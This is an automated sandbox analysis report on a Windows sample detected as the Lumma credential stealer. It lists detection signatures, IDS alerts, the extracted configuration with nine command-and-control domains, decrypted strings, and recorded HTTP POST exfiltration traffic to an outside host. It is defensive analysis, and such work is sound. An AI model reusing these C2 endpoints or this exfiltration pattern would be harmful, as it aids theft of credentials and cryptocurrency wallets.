Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583463
MD5:2ea329cf21fe95c260ea3b956b6fbb75
SHA1:4c8a6dfe97d33ada86c65298ad91ab46eddc8454
SHA256:36c05fed693856403b0e8aa36b032d350424ec12a657cb9a98f974f218db3884
Tags:exeuser-jstrosch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2EA329CF21FE95C260EA3B956B6FBB75)
    • WerFault.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["enterwahsh.biz", "slipperyloo.lat", "wordyfindy.lat", "talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat"], "Build id": "HpOoIh--2a727a032c4d"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 9 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:37.300052+010020283713Unknown Traffic192.168.2.749700104.102.49.254443TCP
              2025-01-02T20:16:38.960921+010020283713Unknown Traffic192.168.2.749701172.67.157.254443TCP
              2025-01-02T20:16:40.006203+010020283713Unknown Traffic192.168.2.749702172.67.157.254443TCP
              2025-01-02T20:16:41.147673+010020283713Unknown Traffic192.168.2.749703172.67.157.254443TCP
              2025-01-02T20:16:42.581309+010020283713Unknown Traffic192.168.2.749704172.67.157.254443TCP
              2025-01-02T20:16:44.220146+010020283713Unknown Traffic192.168.2.749705172.67.157.254443TCP
              2025-01-02T20:16:46.058309+010020283713Unknown Traffic192.168.2.749706172.67.157.254443TCP
              2025-01-02T20:16:47.123519+010020283713Unknown Traffic192.168.2.749708172.67.157.254443TCP
              2025-01-02T20:16:48.194549+010020283713Unknown Traffic192.168.2.749714172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:39.387797+010020546531A Network Trojan was detected192.168.2.749701172.67.157.254443TCP
              2025-01-02T20:16:40.457154+010020546531A Network Trojan was detected192.168.2.749702172.67.157.254443TCP
              2025-01-02T20:16:49.039380+010020546531A Network Trojan was detected192.168.2.749714172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:39.387797+010020498361A Network Trojan was detected192.168.2.749701172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:40.457154+010020498121A Network Trojan was detected192.168.2.749702172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.612478+010020584801Domain Observed Used for C2 Detected192.168.2.7520391.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.589526+010020584841Domain Observed Used for C2 Detected192.168.2.7649561.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.519517+010020586081Domain Observed Used for C2 Detected192.168.2.7545381.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.555116+010020584921Domain Observed Used for C2 Detected192.168.2.7539371.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.565149+010020585001Domain Observed Used for C2 Detected192.168.2.7533771.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.543814+010020585021Domain Observed Used for C2 Detected192.168.2.7611641.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.577393+010020585101Domain Observed Used for C2 Detected192.168.2.7576641.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.600816+010020585121Domain Observed Used for C2 Detected192.168.2.7616921.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:36.532234+010020585141Domain Observed Used for C2 Detected192.168.2.7601671.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:47.622921+010020480941Malware Command and Control Activity Detected192.168.2.749708172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T20:16:38.355437+010028586661Domain Observed Used for C2 Detected192.168.2.749700104.102.49.254443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://lev-tolstoi.com/xAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apiypAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com:443/apiocalAvira URL Cloud: Label: malware
              Source: enterwahsh.bizAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apixAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api$Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apiCAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/BAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/wsAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apisyAvira URL Cloud: Label: malware
              Source: 0.3.file.exe.2150000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["enterwahsh.biz", "slipperyloo.lat", "wordyfindy.lat", "talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat"], "Build id": "HpOoIh--2a727a032c4d"}
              Source: file.exeReversingLabs: Detection: 63%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: enterwahsh.biz
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A273 CryptUnprotectData,0_2_0041A273

              Compliance

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
              Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49714 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_00440150
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+1Ch]0_2_0040B1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042CB9F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000000A0h]0_2_0042CB9F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0043CF41
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], D2F34142h0_2_0043CF41
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_0040E7E4
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6DE4BC99h]0_2_0042A042
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_004250D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push esi0_2_0040D944
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then test eax, eax0_2_00438910
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], A269EEEFh0_2_00438910
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+5A508E43h]0_2_00438910
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 403020B8h0_2_0040E1A2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+44h]0_2_0040F1A2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movsx esi, bl0_2_0040824E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042BA60
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00415A62
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+38h]0_2_0040CA7B
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00435210
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00416220
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [0044A2E0h]0_2_0040C224
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00429AA5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_0041DB6A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_004253C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+14h]0_2_0042ABCE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00407420
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00407420
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+03h]0_2_0041CCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, bx0_2_004254E9

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.7:64956 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058608 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) : 192.168.2.7:54538 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.7:53377 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.7:53937 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.7:61692 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.7:60167 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.7:61164 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.7:52039 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.7:57664 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49708 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49714 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49700 -> 104.102.49.254:443
              Source: Malware configuration extractorURLs: enterwahsh.biz
              Source: Malware configuration extractorURLs: slipperyloo.lat
              Source: Malware configuration extractorURLs: wordyfindy.lat
              Source: Malware configuration extractorURLs: talkynicer.lat
              Source: Malware configuration extractorURLs: tentabatte.lat
              Source: Malware configuration extractorURLs: shapestickyr.lat
              Source: Malware configuration extractorURLs: bashfulacid.lat
              Source: Malware configuration extractorURLs: manyrestro.lat
              Source: Malware configuration extractorURLs: curverpluch.lat
              Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 172.67.157.254:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CRHWV3EVPVRBWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12821Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2YLYEFNEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15029Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BN7PQMTTJNCXTFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20384Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KNV94W4VEHFS6930User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1229Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KR9OPG0Z12N8NXIBQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1125Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: lev-tolstoi.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: enterwahsh.biz
              Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
              Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
              Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
              Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
              Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
              Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
              Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
              Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
